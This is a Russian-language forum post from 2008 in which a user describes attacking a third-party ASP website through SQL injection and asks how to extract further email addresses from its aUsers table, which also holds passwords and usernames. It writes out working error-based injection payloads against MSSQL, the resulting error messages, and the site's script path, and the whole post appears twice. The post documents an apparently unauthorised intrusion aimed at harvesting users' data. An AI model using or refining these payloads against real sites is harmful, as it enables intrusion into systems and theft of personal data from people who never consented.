constanta
25.02.2008, 14:15
Уважаемые Гуру, начал изучать не так давно mssql и столкнулся на одном, очень интересном для меня, ресурсе вот с такой бедой :
Прочитал из базы все таблицы и имена всех колонок из интересующих меня таблиц.
В результате имеем таблицу
aUsers и колонки в ней
Email
EventUser
LastLogon
LogOns
Name
Notes
Password
UserID
UserName
Попробывал прочитать интересующую меня колонку
Emai вот таким способом
1+or+1=(SELECT+TOP+1+email+from+aUsers)
Получил
ADODB.Parameter error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/duich/events/List.asp, line 185
Перестроил запрос на вот так
1+or+1=(SELECT+TOP+1+email+from+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME='aUsers'+AND+COLUMN_NAME ='email')
Получил 1 мыло. Дальше пытался в конце добавить + where+userid={какое то значение}
получил синтаксическую ошибку. Я так понимаю что 2 раза where не катит. Хорошо сделал вот так
1+or+1=(SELECT+max(email)+from+aUsers)
Получал опять какое то мыло.
ВОПРОС!!! КАк можно просмотреть дальше список емайлов если 1+or+1=(SELECT+TOP+1+email+from+aUsers)
не работает.
Прошу прощения что так длинно все это описал. Хотел просто что бы вы видели мои действия.
З.Ы Хочу выразить отдельную благодарность Cash за его статью про MsSql. Спасибо огромное!!!!
Прочитал из базы все таблицы и имена всех колонок из интересующих меня таблиц.
В результате имеем таблицу
aUsers и колонки в ней
EventUser
LastLogon
LogOns
Name
Notes
Password
UserID
UserName
Попробывал прочитать интересующую меня колонку
Emai вот таким способом
1+or+1=(SELECT+TOP+1+email+from+aUsers)
Получил
ADODB.Parameter error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/duich/events/List.asp, line 185
Перестроил запрос на вот так
1+or+1=(SELECT+TOP+1+email+from+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME='aUsers'+AND+COLUMN_NAME ='email')
Получил 1 мыло. Дальше пытался в конце добавить + where+userid={какое то значение}
получил синтаксическую ошибку. Я так понимаю что 2 раза where не катит. Хорошо сделал вот так
1+or+1=(SELECT+max(email)+from+aUsers)
Получал опять какое то мыло.
ВОПРОС!!! КАк можно просмотреть дальше список емайлов если 1+or+1=(SELECT+TOP+1+email+from+aUsers)
не работает.
Прошу прощения что так длинно все это описал. Хотел просто что бы вы видели мои действия.
З.Ы Хочу выразить отдельную благодарность Cash за его статью про MsSql. Спасибо огромное!!!!